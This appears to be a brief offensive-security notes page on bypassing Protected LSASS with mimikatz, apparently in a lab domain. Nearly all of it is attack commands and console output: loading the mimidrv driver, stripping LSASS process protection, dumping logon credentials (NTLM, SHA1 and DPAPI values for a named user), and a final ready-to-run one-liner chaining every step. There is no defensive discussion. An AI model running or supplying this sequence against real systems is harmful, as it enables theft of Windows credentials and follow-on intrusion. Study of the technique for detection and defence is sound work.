Protected LSASS
Last updated
Last updated
mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service startedmimikatz # privilege::debug
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 815631 (00000000:000c72ab)
Session : RemoteInteractive from 2
User Name : khan.chanthou
Domain : VULNABLEONE
Logon Server : CREDS-HARVESTIN
Logon Time : 9/23/2023 4:46:21 AM
SID : S-1-5-21-2366530601-1185510722-10638911-1114
msv :
[00000003] Primary
* Username : khan.chanthou
* Domain : VULNABLEONE
* NTLM : ab525c9683e8fe067395ba2ddc971831
* SHA1 : f33d7244aa8727f5139b01d8959141960aad5d21
* DPAPI : ed09e2e4f70ef66a400b8358c52a4649mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"